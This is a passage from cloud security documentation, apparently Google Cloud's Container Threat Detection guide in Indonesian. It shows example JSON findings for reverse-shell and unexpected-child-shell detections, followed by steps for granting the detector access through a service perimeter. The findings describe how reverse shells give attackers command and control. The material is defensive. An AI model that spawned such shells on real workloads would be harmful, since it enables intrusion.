"KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT", "_\u003d/bin/echo"],
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Binary_Fullpath": "BINARY_PATH",
"Container_Creation_Timestamp": {
"seconds": 1.617989861E9,
"nanos": 0.0
},
"Pod_Name": "POD_NAME",
"Container_Name": "CONTAINER_NAME",
"Process_Arguments": ["BINARY_PATH", "BINARY_NAME"],
"Pid": 15.0,
"Reverse_Shell_Stdin_Redirection_Dst_Port": DESTINATION_PORT,
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Reverse_Shell_Stdin_Redirection_Dst_Ip": "DESTINATION_IP_ADDRESS",
"Pod_Namespace": "default",
"VM_Instance_Name": "INSTANCE_ID",
"Reverse_Shell_Stdin_Redirection_Src_Port": SOURCE_PORT,
"description": "A process started with stream redirection to a remote
connected socket. With a reverse shell, an attacker can communicate from a
compromised workload to an attacker-controlled machine. The attacker can
then command and control the workload to perform desired actions, for
example as part of a botnet.",
"Parent_Pid": 1.0,
"Process_Creation_Timestamp": {
"seconds": 1.61798989E9,
"nanos": 6.16573691E8
}
},
"securityMarks": {
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
},
"eventTime": "2021-04-09T17:38:10.904Z",
"createTime": "2021-04-09T17:38:15.486Z",
"propertyDataTypes": {
"Container_Image_Id": {
"primitiveDataType": "STRING"
},
"Container_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Pod_Namespace": {
"primitiveDataType": "STRING"
},
"Environment_Variables": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Reverse_Shell_Stdin_Redirection_Dst_Ip": {
"primitiveDataType": "STRING"
},
"description": {
"primitiveDataType": "STRING"
},
"Process_Arguments": {
"listValues": {
"propertyDataTypes": [{
"primitiveDataType": "STRING"
}]
}
},
"Pid": {
"primitiveDataType": "NUMBER"
},
"Reverse_Shell_Stdin_Redirection_Src_Ip": {
"primitiveDataType": "STRING"
},
"Container_Image_Uri": {
"primitiveDataType": "STRING"
},
"Reverse_Shell_Stdin_Redirection_Dst_Port": {
"primitiveDataType": "NUMBER"
},
"Pod_Name": {
"primitiveDataType": "STRING"
},
"Process_Creation_Timestamp": {
"dataType": "TIMESTAMP",
"structValue": {
"fields": {
"seconds": {
"primitiveDataType": "NUMBER"
},
"nanos": {
"primitiveDataType": "NUMBER"
}
}
}
},
"Reverse_Shell_Stdin_Redirection_Src_Port": {
"primitiveDataType": "NUMBER"
},
"Parent_Pid": {
"primitiveDataType": "NUMBER"
},
"VM_Instance_Name": {
"primitiveDataType": "STRING"
},
"Container_Name": {
"primitiveDataType": "STRING"
},
"Process_Binary_Fullpath": {
"primitiveDataType": "STRING"
}
},
"severity": "CRITICAL",
"workflowState": "NEW",
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
"projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"projectDisplayName": "PROJECT_ID",
"parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parentDisplayName": "PROJECT_ID",
"type": "google.container.Cluster"
}
}
Shell Turunan yang Tidak Terduga
{
"finding": {
"access": {},
"canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
"category": "Unexpected Child Shell",
"cloudDlpDataProfile": {},
"cloudDlpInspection": {},
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": "CONTAINER_IMAGE_ID"
}
],
"createTime": "2023-06-29T17:34:13.765Z",
"database": {},
"description": "A process should not normally create child shell processes, spawn a child shell process.",
"eventTime": "2023-06-29T17:34:13.492Z",
"exfiltration": {},
"findingClass": "THREAT",
"findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
"indicator": {},
"kernelRootkit": {},
"kubernetes": {
"pods": [
{
"ns": "default",
"name": "CONTAINER_NAME",
"containers": [
{
"name": "CONTAINER_NAME",
"uri": "CONTAINER_URI",
"imageId": CONTAINER_IMAGE_ID"
}
]
}
]
},
"mitreAttack": {
"primaryTactic": "EXECUTION",
"primaryTechniques": [
"COMMAND_AND_SCRIPTING_INTERPRETER"
]
},
"name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
"parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
"parentDisplayName": "Container Threat Detection",
"processes": [
{
"binary": {
"path": "\"/home/vmagent/app/temp/dash\"",
"size": "31376",
"sha256": "31351885b07570f450f57bd19cf28ff4310b8774a1c2580c3c7c9e7336c8467e",
"hashedSize": "31376",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"./temp/dash\""
],
"argumentsTruncated": false,
"envVariables": [
{
"name": "\"HOSTNAME\"",
"val": "\"ktd-test-unexpected-child-shell-3f50de2ab54bac1b\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_PORT\"",
"val": "\"tcp://10.52.113.1:443\""
},
{
"name": "\"PYTHONUNBUFFERED\"",
"val": "\"1\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT\"",
"val": "\"443\""
},
{
"name": "\"KUBERNETES_SERVICE_HOST\"",
"val": "\"10.52.113.1\""
},
{
"name": "\"PATH\"",
"val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
},
{
"name": "\"PWD\"",
"val": "\"/home/vmagent/app\""
},
{
"name": "\"LANG\"",
"val": "\"C.UTF-8\""
},
{
"name": "\"SHLVL\"",
"val": "\"1\""
},
{
"name": "\"HOME\"",
"val": "\"/root\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
"val": "\"tcp\""
},
{
"name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
"val": "\"443\""
},
{
"name": "\"DEBIAN_FRONTEND\"",
"val": "\"noninteractive\""
},
{
"name": "\"PORT\"",
"val": "\"8080\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
"val": "\"10.52.113.1\""
},
{
"name": "\"KUBERNETES_PORT_443_TCP\"",
"val": "\"tcp://10.52.113.1:443\""
},
{
"name": "\"_\"",
"val": "\"./temp/dash\""
}
],
"pid": "15",
"parentPid": "14"
},
{
"binary": {
"path": "\"/home/vmagent/app/temp/httpd\"",
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"script": {
"size": "0",
"hashedSize": "0",
"partiallyHashed": false
},
"args": [
"\"./temp/httpd\""
],
"argumentsTruncated": false,
"pid": "14",
"parentPid": "13"
}
],
"resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"severity": "CRITICAL",
"state": "ACTIVE",
"vulnerability": {}
},
"resource": {
"name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
"display_name": "CLUSTER_ID",
"project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"project_display_name": "PROJECT_ID",
"parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
"parent_display_name": "PROJECT_ID",
"type": "google.container.Cluster",
"folders": []
},
"sourceProperties": {
"Process_Arguments": [
"./temp/dash"
],
"Pid": 15,
"Process_Creation_Timestamp": {
"seconds": 1688060050,
"nanos": 207040864
},
"Container_Image_Uri": "CONTAINER_IMAGE_URI",
"Process_Binary_Fullpath": "/home/vmagent/app/temp/dash",
"VM_Instance_Name": "INSTANCE_ID",
"Pod_Name": "POD_NAME",
"Pod_Namespace": "default",
"Container_Name": "CONTAINER_NAME",
"Container_Image_Id": "CONTAINER_IMAGE_ID",
"Container_Creation_Timestamp": {
"seconds": 1688060050,
"nanos": 0
},
"Parent_Pid": 14,
"Environment_Variables": [
"HOSTNAME=ktd-test-unexpected-child-shell-3f50de2ab54bac1b",
"KUBERNETES_PORT_443_TCP_PORT=443",
"KUBERNETES_PORT=tcp://10.52.113.1:443",
"PYTHONUNBUFFERED=1",
"KUBERNETES_SERVICE_PORT=443",
"KUBERNETES_SERVICE_HOST=10.52.113.1",
"PATH=/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PWD=/home/vmagent/app",
"LANG=C.UTF-8",
"SHLVL=1",
"HOME=/root",
"KUBERNETES_PORT_443_TCP_PROTO=tcp",
"KUBERNETES_SERVICE_PORT_HTTPS=443",
"DEBIAN_FRONTEND=noninteractive",
"PORT=8080",
"KUBERNETES_PORT_443_TCP_ADDR=10.52.113.1",
"KUBERNETES_PORT_443_TCP=tcp://10.52.113.1:443",
"_=./temp/dash"
]
}
}
Memindai project yang dilindungi oleh perimeter layanan
Jika Anda mengaktifkan Security Command Center di tingkat organisasi setelah 7 Desember 2023 dan memiliki perimeter layanan yang memblokir akses ke project dan layanan tertentu, Anda harus memberikan akses masuk Deteksi Ancaman Container ke perimeter layanan tersebut. Jika tidak, Container Threat Detection tidak dapat memberikan temuan yang terkait dengan project dan layanan yang dilindungi.
Untuk aktivasi tingkat organisasi, ID akun layanan adalah alamat email dalam format berikut:
service-org-ORGANIZATION_ID@gcp-sa-ktd-hpsa.iam.gserviceaccount.com
Pada contoh sebelumnya, ganti ORGANIZATION_ID
dengan ID numerik organisasi Anda.
Untuk memberikan akses masuk ke akun layanan ke perimeter layanan, ikuti langkah-langkah berikut.
Buka Kontrol Layanan VPC.
Di toolbar, pilih organisasi Google Cloud Anda.
Di menu drop-down, pilih kebijakan akses yang berisi perimeter layanan yang ingin Anda berikan aksesnya.
Perimeter layanan yang terkait dengan kebijakan akses akan muncul dalam daftar.
Klik nama perimeter layanan.
Klik Edit perimeter
Di menu navigasi, klik Ingress Policy.
Klik Tambahkan Aturan.
Konfigurasikan aturan sebagai berikut:
Atribut FROM klien API
- Untuk Sumber, pilih Semua sumber.
- Untuk Identity, pilih Identitas yang dipilih.
- Di kolom Tambahkan Akun Pengguna/Layanan, klik Pilih.
- Masukkan alamat email akun layanan. Jika Anda memiliki akun layanan level organisasi dan level project, tambahkan keduanya.
- Klik Save.
KE atribut layanan/resource GCP
-
Untuk Project, pilih All projects.
Untuk Layanan, pilih Semua layanan atau pilih setiap layanan individual berikut yang diperlukan oleh Container Threat Detection:
- Container Threat Detection API
Jika perimeter layanan membatasi akses ke layanan yang diperlukan, Container Threat Detection tidak dapat menghasilkan temuan untuk layanan tersebut.
Di menu navigasi, klik Simpan.
Untuk informasi selengkapnya, lihat Mengonfigurasi kebijakan traffic masuk dan keluar.
Langkah selanjutnya
Pelajari lebih lanjut cara kerja Deteksi Ancaman Container.
Pelajari cara menyelidiki dan mengembangkan rencana respons terhadap ancaman.